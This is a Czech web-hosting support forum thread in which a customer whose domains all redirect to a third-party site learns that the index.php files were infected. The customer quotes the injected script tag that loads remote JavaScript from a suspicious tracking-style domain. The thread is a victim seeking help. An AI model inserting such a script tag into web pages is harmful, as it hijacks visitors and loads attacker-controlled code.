Všechny domény na hostingu přesměrovány
Dobrý den,
dnes jsem si všiml, že veškeré domény pod mým webhostingem jsou přesměrovány zásahem třetí strany. Chtěl bych se zeptat, jestli je chyba na mé či Vaší straně a případně kde může být problém. A jak nejlépe toto vyřešit a postarat se o to, aby se to již neopakovalo. Mockrát děkuji za odpověď a případnou asistenci.
S pozdravem,
Špaček
8 Answers
Dobrý den,
to bohužel na klasickém webhostingu nelze. Toto je možné pouze u WMS, kdy si nevytváříte multihosting ale pro každý web si vytvoříte vlastní webhosting -> https://www.wedos.cz/wms
Dobrý den,
To vypadá jako napadený / hacknutý web. Pokud máte zálohu webu z doby, kdy fungoval, doporučuji provést obnovu. Případně proskenujte soubory webu vaším antivirovým programem nebo kontaktujte někoho, kdo se zabývá odvirováním webů.
Pokud jde o nějaký redakční systém, zkontrolujte, zda se nezměnila nastavená URL adresa webu. Může to způsobovat nějaký plugin, pokud byl v nedávné době nějaký plugin nově aktivovaný, zkuste jej vypnout.
Stejné přesměrování se týká všech domén pod tímto účtem. Tedy by to vypadalo na hacknutý FTP účet? Něco jede na WordPressu ale něco ne, přitom chyba stejný. Na plug-in bych to tedy neviděl. Zálohy webů v nynější podobě nemám. Předpokládal jsem, že pro tyto případy běží nějaký zálohovací systém na Vaší straně a je možné rollback na „relativně nedávnou“ verzi webu? Možnost otestovat hosting antivirem jsem nikde na webu nenašel.
Dobrý den,
z naší strany je obnova ze zálohy možná. Avšak je možné, že již záloha obsahuje napadený web.
Obnova ze zálohy u webhostingu NoLimit a služeb VPS je zpoplatněna částkou 500 CZK bez DPH, u NoLimit EXTRA je obnova zdarma.
Pokud souhlasíte s cenou sdělte nám následující informace skrze kontaktní formulář (https://hosting.wedos.com/cs/cform.html):
1) Název služby:
2) Záloha FTP, DB (název), oboje:
3) Z jakého dne zálohu požadujete (přesný datum zálohy upřesní technik):
4) Způsob obnovy (a/b):
a) Přepsat všechny současné data na FTP daty ze zálohy (export databáze bude umístěn na FTP)
b) Nahrát data ze zálohy do samostatné složky na FTP
Dle datumů úprav souborů na FTP jsou to index.php. Opravím si je, ale chtěl bych se zeptat jestli máte nějakou možnost zjistit jak k útoku došlo, či jak mu v budoucnu zabránit. Změním heslo všech FTP účtů, ale pokud máte jiné tipy k tomu rád si je přečtu. Děkuji.
Tak jsem zkusil udělat čistou instalaci WP. Původně to vypadalo, že všechny index.php byly napadeny s vložením „<script type=’text/javascript‘ src=’https://stat.trackstatisticsss.com/k.js?v=222′></script>“. Na tento web je vše přesměrováno. Bohužel po odstranění scriptu se nedaří problém odstranit. Po čisté instalaci WP základní stránka funguje, avšak po zadání www.doména.cz/wp-admin se opět přesměruje (mělo by to přeci tahat vše z nové instalaci a především svého složky v /domains.
Dalsi poznatek je, ze cely redirect zpusobuje nejaky javascript (kdyz ho vypnu v prohliceci, vse vali). Nejaky zpusob jak relativne jednoduse odkrokovat nacitani aby se ukazalo kde a jaky javascript redirect zpusobi? Dekuju za rady.